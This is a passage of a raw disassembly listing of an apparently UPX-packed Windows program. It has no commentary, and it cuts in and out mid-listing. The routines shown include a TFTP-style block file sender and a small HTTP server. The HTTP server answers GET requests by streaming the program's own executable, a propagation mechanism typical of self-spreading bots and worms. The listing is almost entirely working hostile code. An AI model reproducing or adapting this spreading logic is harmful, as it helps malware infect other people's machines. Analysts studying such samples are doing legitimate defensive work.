push dword ptr [ebp-1Ch]
call ds:dword_47B73C ; inet_ntoa
push eax
lea eax, [ebp-30h]
push 10h
push eax
call ds:dword_47B620 ; _snprintf
add esp, 0Ch
cmp [ebp-338h], bl
jnz loc_40BB9D
cmp byte ptr [ebp-337h], 1
jnz short loc_40BAB4
push offset dword_40FBA0
call sub_40C28E ; strlen
push ebx
push ebx
push dword ptr [ebp+8]
call ds:dword_47B58C ; fseek
push dword ptr [ebp+8]
lea eax, [ebp-230h]
mov [ebp-234h], bl
mov byte ptr [ebp-233h], 3
push esi
push 1
push eax
mov [ebp-232h], bl
mov byte ptr [ebp-231h], 1
call ds:dword_47B598 ; fread
add esp, 20h
lea ecx, [ebp-20h]
add eax, 4
push dword ptr [ebp-4]
push ecx
push ebx
push eax
lea eax, [ebp-234h]
push eax
loc_40BA99: ; CODE XREF: UPX0:0040BBAC�j
push 6
call sub_401226
imul eax, 220h
pop ecx
push dword_427638[eax]
call edi ; dword_47B744
jmp loc_40B973
; ---------------------------------------------------------------------------
loc_40BAB4: ; CODE XREF: UPX0:0040BA3F�j
cmp byte ptr [ebp-337h], 4
jnz loc_40BB9D
mov cl, [ebp-335h]
mov al, [ebp-336h]
cmp cl, 0FFh
mov [ebp-234h], bl
mov byte ptr [ebp-233h], 3
jnz short loc_40BAF1
inc al
xor cl, cl
mov [ebp-232h], al
mov [ebp-231h], bl
jmp short loc_40BAFF
; ---------------------------------------------------------------------------
loc_40BAF1: ; CODE XREF: UPX0:0040BADD�j
inc cl
mov [ebp-232h], al
mov [ebp-231h], cl
loc_40BAFF: ; CODE XREF: UPX0:0040BAEF�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push dword ptr [ebp+8]
call ds:dword_47B58C ; fseek
push dword ptr [ebp+8]
lea eax, [ebp-230h]
push esi
push 1
push eax
call ds:dword_47B598 ; fread
add esp, 1Ch
lea ecx, [ebp-20h]
mov [ebp-8], eax
add eax, 4
push dword ptr [ebp-4]
push ecx
push ebx
push eax
lea eax, [ebp-234h]
push eax
push 6
call sub_401226
imul eax, 220h
pop ecx
push dword_427638[eax]
call edi ; dword_47B744
cmp [ebp-8], ebx
jnz loc_40B973
lea eax, [ebp-30h]
push eax
lea eax, [ebp-30h]
push eax
call sub_401186
pop ecx
push eax
mov eax, dword_413814
imul eax, 188h
add eax, offset word_40FD72
push offset dword_413270
push eax
push dword ptr [ebp-4FCh]
call sub_40104B
add esp, 14h
jmp loc_40B973
; ---------------------------------------------------------------------------
loc_40BB9D: ; CODE XREF: UPX0:0040BA32�j
; UPX0:0040BABB�j
push dword ptr [ebp-4]
lea eax, [ebp-20h]
push eax
push ebx
push 9
push offset dword_413264
jmp loc_40BA99
; ---------------------------------------------------------------------------
loc_40BBB1: ; CODE XREF: UPX0:0040BA0D�j
push ebx
call ds:dword_47B4C4 ; ExitThread
loc_40BBB8: ; CODE XREF: UPX0:0040B943�j
; UPX0:0040B962�j
push ebx
call ds:dword_47B4C4 ; ExitThread
; ---------------------------------------------------------------------------
db 0C3h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC82 proc near ; CODE XREF: sub_4011F9�j
var_1A70 = byte ptr -1A70h
var_A70 = byte ptr -0A70h
var_8E0 = byte ptr -8E0h
var_8DF = byte ptr -8DFh
var_4E0 = byte ptr -4E0h
var_4D8 = dword ptr -4D8h
var_408 = byte ptr -408h
var_304 = dword ptr -304h
var_200 = dword ptr -200h
var_1FC = dword ptr -1FCh
var_FC = byte ptr -0FCh
var_B4 = byte ptr -0B4h
var_A4 = byte ptr -0A4h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_60 = byte ptr -60h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1A70h
call sub_40C3E0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 36h
mov esi, eax
pop ecx
lea edi, [ebp+var_4E0]
rep movsd
push 1
pop esi
mov [eax+0D0h], esi
lea eax, [ebp+var_A70]
push eax
push 2
call ds:dword_47B718 ; WSAStartup
xor ebx, ebx
mov [ebp+var_18], esi
push ebx
push esi
push 2
mov [ebp+var_2C], esi
mov [ebp+var_200], ebx
mov [ebp+var_304], ebx
call ds:dword_47B708 ; socket
mov edi, eax
lea eax, [ebp+var_18]
push 4
push eax
push 4
push 0FFFFh
push edi
mov [ebp+var_10], edi
call ds:dword_47B728 ; setsockopt
lea eax, [ebp+var_2C]
push eax
push 8004667Eh
push edi
call ds:dword_47B6F0 ; ioctlsocket
push [ebp+var_4D8]
mov [ebp+var_40], 2
mov [ebp+var_3C], ebx
call ds:dword_47B724 ; ntohs
mov [ebp+var_3E], ax
lea eax, [ebp+var_40]
push 10h
push eax
push edi
call ds:dword_47B72C ; bind
test eax, eax
jl short loc_40BD9D
push 0Ah
push edi
call ds:dword_47B730 ; listen
push 0Ch
mov [ebp+var_1FC], edi
mov [ebp+var_4], edi
pop ecx
xor eax, eax
lea edi, [ebp+var_93]
mov [ebp+var_94], bl
push offset aApplicationOct ; "application/octet-stream"
rep stosd
stosb
lea eax, [ebp+var_94]
mov [ebp+var_200], esi
push eax
call ds:dword_47B5FC ; sprintf
pop ecx
lea eax, [ebp+var_408]
pop ecx
push 104h
push eax
push ebx
call ds:dword_47B510 ; GetModuleFileNameA
push ebx
push ebx
push 3
push ebx
push esi
lea eax, [ebp+var_408]
push 80000000h
push eax
call ds:dword_47B4C0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40BDA6
loc_40BD9D: ; CODE XREF: sub_40BC82+A7�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40BDA6: ; CODE XREF: sub_40BC82+119�j
push ebx
push esi
call ds:dword_47B438 ; GetFileSize
push esi
mov [ebp+var_20], eax
call ds:dword_47B520 ; CloseHandle
lea eax, [ebp+var_FC]
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_47B43C ; GetDateFormatA
lea eax, [ebp+var_60]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_47B444 ; GetTimeFormatA
loc_40BDE8: ; CODE XREF: sub_40BC82+193�j
; sub_40BC82+2BF�j ...
push 41h
lea esi, [ebp+var_200]
pop ecx
lea edi, [ebp+var_304]
rep movsd
mov esi, [ebp+var_4]
push ebx
push ebx
lea eax, [ebp+var_304]
push ebx
push eax
lea eax, [esi+1]
push eax
call ds:dword_47B710 ; select
cmp esi, ebx
mov [ebp+arg_0], ebx
jl short loc_40BDE8
loc_40BE17: ; CODE XREF: sub_40BC82+2B9�j
mov esi, [ebp+arg_0]
lea eax, [ebp+var_304]
push eax
push esi
call sub_40C210 ; __WSAFDIsSet
test eax, eax
jz loc_40BF34
cmp esi, [ebp+var_10]
jnz short loc_40BE9D
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_A4]
push eax
push [ebp+var_10]
call ds:dword_47B6F8 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40BF34
mov edi, [ebp+var_200]
xor ecx, ecx
cmp edi, ebx
jbe short loc_40BE76
lea edx, [ebp+var_1FC]
loc_40BE6A: ; CODE XREF: sub_40BC82+1F2�j
cmp [edx], eax
jz short loc_40BE76
inc ecx
add edx, 4
cmp ecx, edi
jb short loc_40BE6A
loc_40BE76: ; CODE XREF: sub_40BC82+1E0�j
; sub_40BC82+1EA�j
cmp ecx, edi
jnz short loc_40BE8C
cmp edi, 40h
jnb short loc_40BE8C
mov [ebp+ecx*4+var_1FC], eax
inc [ebp+var_200]
loc_40BE8C: ; CODE XREF: sub_40BC82+1F6�j
; sub_40BC82+1FB�j
cmp eax, [ebp+var_4]
jle loc_40BF34
mov [ebp+var_4], eax
jmp loc_40BF34
; ---------------------------------------------------------------------------
loc_40BE9D: ; CODE XREF: sub_40BC82+1B0�j
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8DF]
mov [ebp+var_8E0], bl
rep stosd
stosw
stosb
push ebx
lea eax, [ebp+var_8E0]
push 200h
push eax
push esi
call ds:dword_47B6FC ; recv
test eax, eax
jg short loc_40BF1C
mov edx, [ebp+var_200]
xor ecx, ecx
cmp edx, ebx
jbe short loc_40BF13
lea eax, [ebp+var_1FC]
loc_40BEDF: ; CODE XREF: sub_40BC82+267�j
cmp [eax], esi
jz short loc_40BEED
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40BEDF
jmp short loc_40BF13
; ---------------------------------------------------------------------------
loc_40BEED: ; CODE XREF: sub_40BC82+25F�j
dec edx
cmp ecx, edx
jnb short loc_40BF0D
lea eax, [ebp+ecx*4+var_1FC]
loc_40BEF9: ; CODE XREF: sub_40BC82+289�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_200]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_40BEF9
loc_40BF0D: ; CODE XREF: sub_40BC82+26E�j
dec [ebp+var_200]
loc_40BF13: ; CODE XREF: sub_40BC82+255�j
; sub_40BC82+269�j
push esi
call ds:dword_47B720 ; closesocket
jmp short loc_40BF34
; ---------------------------------------------------------------------------
loc_40BF1C: ; CODE XREF: sub_40BC82+249�j
lea eax, [ebp+var_8E0]
push offset aGet ; "GET "
push eax
call ds:dword_47B610 ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_40BF46
loc_40BF34: ; CODE XREF: sub_40BC82+1A7�j
; sub_40BC82+1D0�j ...
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jle loc_40BE17
jmp loc_40BDE8
; ---------------------------------------------------------------------------
loc_40BF46: ; CODE XREF: sub_40BC82+2B0�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_B4]
push eax
push esi
call ds:dword_47B734 ; getpeername
mov [ebp+var_30], eax
lea eax, [ebp+var_60]
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_60]
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_60]
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_94]
push [ebp+var_20]
push eax
lea eax, [ebp+var_1A70]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: private\r\nCache"...
push eax
call ds:dword_47B5FC ; sprintf
add esp, 28h
lea eax, [ebp+var_1A70]
push ebx
push eax
call sub_40C28E ; strlen
mov edi, ds:dword_47B700
pop ecx
push eax
lea eax, [ebp+var_1A70]
push eax
push esi
call edi ; dword_47B700
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_408]
push 80000000h
push eax
mov [ebp+var_8], 1000h
mov [ebp+var_28], ebx
call ds:dword_47B4C0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40BFF4
push [ebp+arg_0]
call ds:dword_47B720 ; closesocket
loc_40BFF4: ; CODE XREF: sub_40BC82+367�j
push ebx
push esi
call ds:dword_47B438 ; GetFileSize
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40C072
loc_40C003: ; CODE XREF: sub_40BC82+3EE�j
push 1000h
lea eax, [ebp+var_1A70]
push ebx
push eax
call sub_40C294 ; memset
mov eax, [ebp+var_C]
add esp, 0Ch
cmp [ebp+var_8], eax
jbe short loc_40C023
mov [ebp+var_8], eax
loc_40C023: ; CODE XREF: sub_40BC82+39C�j
push 2
push ebx
neg eax
push eax
push esi
call ds:dword_47B458 ; SetFilePointer
lea eax, [ebp+var_28]
push ebx
push eax
lea eax, [ebp+var_1A70]
push [ebp+var_8]
push eax
push esi
call ds:dword_47B448 ; ReadFile
push ebx
lea eax, [ebp+var_1A70]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call edi ; dword_47B700
add [ebp+var_14], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40C06D
call ds:dword_47B704 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_40C072
xor eax, eax
loc_40C06D: ; CODE XREF: sub_40BC82+3DA�j
sub [ebp+var_C], eax
jnz short loc_40C003
loc_40C072: ; CODE XREF: sub_40BC82+37F�j
; sub_40BC82+3E7�j
cmp esi, 0FFFFFFFFh
jz short loc_40C07E
push esi
call ds:dword_47B520 ; CloseHandle
loc_40C07E: ; CODE XREF: sub_40BC82+3F3�j
cmp [ebp+var_30], ebx
jnz short loc_40C086
mov [ebp+var_14], ebx
loc_40C086: ; CODE XREF: sub_40BC82+3FF�j
push [ebp+arg_0]
call ds:dword_47B720 ; closesocket
jmp loc_40BDE8
sub_40BC82 endp
; ---------------------------------------------------------------------------
db 104h dup(0CCh)
; ---------------------------------------------------------------------------
jmp ds:dword_47B70C
; ---------------------------------------------------------------------------
jmp ds:dword_47B740
; ---------------------------------------------------------------------------
jmp ds:dword_47B73C
; ---------------------------------------------------------------------------
jmp ds:dword_47B738
; ---------------------------------------------------------------------------
jmp ds:dword_47B734
; ---------------------------------------------------------------------------
jmp ds:dword_47B730
; ---------------------------------------------------------------------------
jmp ds:dword_47B72C
; ---------------------------------------------------------------------------
jmp ds:dword_47B728
; ---------------------------------------------------------------------------
jmp ds:dword_47B724
; ---------------------------------------------------------------------------
jmp ds:dword_47B720
; ---------------------------------------------------------------------------
jmp ds:dword_47B71C
; ---------------------------------------------------------------------------
jmp ds:dword_47B718
; ---------------------------------------------------------------------------
jmp ds:dword_47B714
; ---------------------------------------------------------------------------
jmp ds:dword_47B710
; ---------------------------------------------------------------------------
jmp ds:dword_47B744
; ---------------------------------------------------------------------------
jmp ds:dword_47B708
; ---------------------------------------------------------------------------
jmp ds:dword_47B704
; ---------------------------------------------------------------------------
jmp ds:dword_47B700
; ---------------------------------------------------------------------------
jmp ds:dword_47B6FC
; ---------------------------------------------------------------------------
jmp ds:dword_47B6F8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C210 proc near ; CODE XREF: sub_40BC82+1A0�p
jmp ds:dword_47B6F4
sub_40C210 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B6F0
; ---------------------------------------------------------------------------
jmp ds:dword_47B408
; ---------------------------------------------------------------------------
jmp ds:dword_47B6C0
; ---------------------------------------------------------------------------
jmp ds:dword_47B6BC
; ---------------------------------------------------------------------------
jmp ds:dword_47B68C
; ---------------------------------------------------------------------------
jmp ds:dword_47B688
; =============== S U B R O U T I N E =======================================
sub_40C23A proc near ; CODE XREF: sub_403E7C+19�p
; sub_403E7C+20�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_40C2A0 ; free
pop ecx
retn
sub_40C23A endp
; ---------------------------------------------------------------------------
align 2
jmp ds:dword_47B620
; ---------------------------------------------------------------------------
jmp ds:dword_47B610
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C252 proc near ; CODE XREF: sub_401727+24�p
; sub_401B8B+5D9�p ...
jmp ds:dword_47B618
sub_40C252 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B614
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C25E proc near ; CODE XREF: sub_401A85+16�p
; sub_401B8B+286�p ...
jmp ds:dword_47B604
sub_40C25E endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B60C
; ---------------------------------------------------------------------------
jmp ds:dword_47B608
; ---------------------------------------------------------------------------
jmp ds:dword_47B5F8
; ---------------------------------------------------------------------------
jmp ds:dword_47B600
; ---------------------------------------------------------------------------
jmp ds:dword_47B5FC
; ---------------------------------------------------------------------------
jmp ds:dword_47B5EC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C288 proc near ; CODE XREF: UPX0:00402BF0�p
; sub_403DB3+14�p ...
jmp ds:dword_47B5F4
sub_40C288 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C28E proc near ; CODE XREF: UPX0:00402BE5�p
; sub_402C2A+D7�p ...
jmp ds:dword_47B5F0
sub_40C28E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C294 proc near ; CODE XREF: sub_402C2A+ED�p
; sub_402C2A+FB�p ...
jmp ds:dword_47B5E0
sub_40C294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C29A proc near ; CODE XREF: UPX0:004034E9�p
; UPX0:00403513�p ...
jmp ds:dword_47B5E8
sub_40C29A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2A0 proc near ; CODE XREF: sub_40C23A+4�p
jmp ds:dword_47B5E4
sub_40C2A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2A6 proc near ; CODE XREF: UPX0:00403265�p
; sub_4042A3+64�p ...
jmp ds:dword_47B5D4
sub_40C2A6 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B5DC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C2C0 proc near ; CODE XREF: sub_40C2EC+4�p
arg_0 = dword ptr 4
cmp ds:dword_47A760, 0FFFFFFFFh
jnz short loc_40C2D5
push [esp+arg_0]
call ds:dword_47B590 ; _onexit
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40C2D5: ; CODE XREF: sub_40C2C0+7�j
push offset dword_47A750
push offset dword_47A760
push [esp+8+arg_0]
call sub_40C688 ; __dllonexit
add esp, 0Ch
retn
sub_40C2C0 endp
; =============== S U B R O U T I N E =======================================
sub_40C2EC proc near ; CODE XREF: UPX0:00403798�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_40C2C0
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_40C2EC endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B5D8
; ---------------------------------------------------------------------------
jmp ds:dword_47B5C8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C310 proc near ; CODE XREF: sub_405186+4E�p
; sub_405186+5B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_40C331
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_40C331: ; CODE XREF: sub_40C310+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_40C34D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_40C34D: ; CODE XREF: sub_40C310+27�j
or eax, eax
jnz short loc_40C369
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_40C3AA
; ---------------------------------------------------------------------------
loc_40C369: ; CODE XREF: sub_40C310+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_40C377: ; CODE XREF: sub_40C310+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_40C377
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_40C3A5
cmp edx, [esp+0Ch+arg_4]
ja short loc_40C3A5
jb short loc_40C3A6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_40C3A6
loc_40C3A5: ; CODE XREF: sub_40C310+85�j
; sub_40C310+8B�j
dec esi
loc_40C3A6: ; CODE XREF: sub_40C310+8D�j
; sub_40C310+93�j
xor edx, edx
mov eax, esi
loc_40C3AA: ; CODE XREF: sub_40C310+57�j
dec edi
jnz short loc_40C3B4
neg edx
neg eax
sbb edx, 0
loc_40C3B4: ; CODE XREF: sub_40C310+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_40C310 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B5D0
; ---------------------------------------------------------------------------
jmp ds:dword_47B5CC
; ---------------------------------------------------------------------------
loc_40C3C6: ; DATA XREF: UPX0:004075AF�o
; UPX0:0040C534�o
jmp ds:dword_47B628
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3CC proc near ; CODE XREF: UPX0:0040768C�p
jmp ds:dword_47B62C
sub_40C3CC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C3E0 proc near ; CODE XREF: sub_407BCA+8�p
; sub_407FC9+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_40C400
loc_40C3EC: ; CODE XREF: sub_40C3E0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40C3EC
loc_40C400: ; CODE XREF: sub_40C3E0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_40C3E0 endp
; ---------------------------------------------------------------------------
align 10h
jmp ds:dword_47B5BC
; ---------------------------------------------------------------------------
jmp ds:dword_47B5C4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C420 proc near ; CODE XREF: UPX0:004096F1�p
; UPX0:0040977C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_40C442
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_40C483
; ---------------------------------------------------------------------------
loc_40C442: ; CODE XREF: sub_40C420+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_40C450: ; CODE XREF: sub_40C420+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40C450
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_40C47E
cmp edx, [esp+8+arg_4]
ja short loc_40C47E
jb short loc_40C47F
cmp eax, [esp+8+arg_0]
jbe short loc_40C47F
loc_40C47E: ; CODE XREF: sub_40C420+4E�j
; sub_40C420+54�j
dec esi
loc_40C47F: ; CODE XREF: sub_40C420+56�j
; sub_40C420+5C�j
xor edx, edx
mov eax, esi
loc_40C483: ; CODE XREF: sub_40C420+20�j
pop esi
pop ebx
retn 10h
sub_40C420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C490 proc near ; CODE XREF: UPX0:004096DF�p
; UPX0:0040976C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40C4B1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_40C501
; ---------------------------------------------------------------------------
loc_40C4B1: ; CODE XREF: sub_40C490+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40C4BF: ; CODE XREF: sub_40C490+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40C4BF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_40C4EA
cmp edx, [esp+4+arg_4]
ja short loc_40C4EA
jb short loc_40C4F2
cmp eax, [esp+4+arg_0]
jbe short loc_40C4F2
loc_40C4EA: ; CODE XREF: sub_40C490+4A�j
; sub_40C490+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40C4F2: ; CODE XREF: sub_40C490+52�j
; sub_40C490+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_40C501: ; CODE XREF: sub_40C490+1F�j
pop ebx
retn 10h
sub_40C490 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C506 proc near ; CODE XREF: UPX0:0040A55E�p
jmp ds:dword_47B5C0
sub_40C506 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B594
; ---------------------------------------------------------------------------
jmp ds:dword_47B5B8
; ---------------------------------------------------------------------------
jmp ds:dword_47B598
; ---------------------------------------------------------------------------
jmp ds:dword_47B58C
; ---------------------------------------------------------------------------
jmp ds:dword_47B580
; ---------------------------------------------------------------------------
loc_40C52A: ; CODE XREF: UPX1:0048101C�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40E0F0
push offset loc_40C3C6
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 68h
push ebx
push esi
push edi
mov [ebp-18h], esp
xor ebx, ebx
mov [ebp-4], ebx
push 2
call ds:dword_47B5B0 ; __set_app_type
pop ecx
or ds:dword_47A750, 0FFFFFFFFh
or ds:dword_47A760, 0FFFFFFFFh
call ds:dword_47B5AC ; __p__fmode
mov ecx, ds:dword_47A740
mov [eax], ecx
call ds:dword_47B5A8 ; __p__commode
mov ecx, ds:dword_47A73C
mov [eax], ecx
mov eax, ds:dword_47B5A4
mov eax, [eax]
mov ds:dword_47A744, eax
call nullsub_1
cmp dword_413430, ebx
jnz short loc_40C5AD
push offset loc_40C6C4
call ds:dword_47B5A0 ; __setusermatherr
pop ecx
loc_40C5AD: ; CODE XREF: UPX0:0040C59F�j
call sub_40C6AC
push offset dword_40F410
push offset dword_40F30C
call sub_40C6A6 ; _initterm
mov eax, ds:dword_47A738
mov [ebp-6Ch], eax
lea eax, [ebp-6Ch]
push eax
push ds:dword_47A734
lea eax, [ebp-64h]
push eax
lea eax, [ebp-70h]
push eax
lea eax, [ebp-60h]
push eax
call ds:dword_47B630 ; __getmainargs
push offset dword_40F208
push offset dword_40F000
call sub_40C6A6 ; _initterm
add esp, 24h
mov eax, ds:dword_47B624
mov esi, [eax]
mov [ebp-74h], esi
cmp byte ptr [esi], 22h
jnz short loc_40C640
loc_40C606: ; CODE XREF: UPX0:0040C612�j
inc esi
mov [ebp-74h], esi
mov al, [esi]
cmp al, bl
jz short loc_40C614
cmp al, 22h
jnz short loc_40C606
loc_40C614: ; CODE XREF: UPX0:0040C60E�j
cmp byte ptr [esi], 22h
jnz short loc_40C61D
loc_40C619: ; CODE XREF: UPX0:0040C625�j
inc esi
mov [ebp-74h], esi
loc_40C61D: ; CODE XREF: UPX0:0040C617�j
; UPX0:0040C643�j
mov al, [esi]
cmp al, bl
jz short loc_40C627
cmp al, 20h
jbe short loc_40C619
loc_40C627: ; CODE XREF: UPX0:0040C621�j
mov [ebp-30h], ebx
lea eax, [ebp-5Ch]
push eax
call ds:dword_47B440 ; GetStartupInfoA
test byte ptr [ebp-30h], 1
jz short loc_40C64B
movzx eax, word ptr [ebp-2Ch]
jmp short loc_40C64E
; ---------------------------------------------------------------------------
loc_40C640: ; CODE XREF: UPX0:0040C604�j
; UPX0:0040C649�j
cmp byte ptr [esi], 20h
jbe short loc_40C61D
inc esi
mov [ebp-74h], esi
jmp short loc_40C640
; ---------------------------------------------------------------------------
loc_40C64B: ; CODE XREF: UPX0:0040C638�j
push 0Ah
pop eax
loc_40C64E: ; CODE XREF: UPX0:0040C63E�j
push eax
push esi
push ebx
push ebx
call ds:dword_47B518 ; GetModuleHandleA
push eax
call sub_401262
mov [ebp-68h], eax
push eax
call ds:dword_47B61C ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-78h], ecx
push eax
push ecx
call sub_40C694 ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-78h]
call ds:dword_47B584 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C688 proc near ; CODE XREF: sub_40C2C0+23�p
jmp ds:dword_47B57C
sub_40C688 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B584
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C694 proc near ; CODE XREF: UPX0:0040C674�p
jmp ds:dword_47B588
sub_40C694 endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B61C
; ---------------------------------------------------------------------------
jmp ds:dword_47B630
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6A6 proc near ; CODE XREF: UPX0:0040C5BC�p
; UPX0:0040C5EF�p
jmp ds:dword_47B59C
sub_40C6A6 endp
; =============== S U B R O U T I N E =======================================
sub_40C6AC proc near ; CODE XREF: UPX0:loc_40C5AD�p
push 30000h
push 10000h
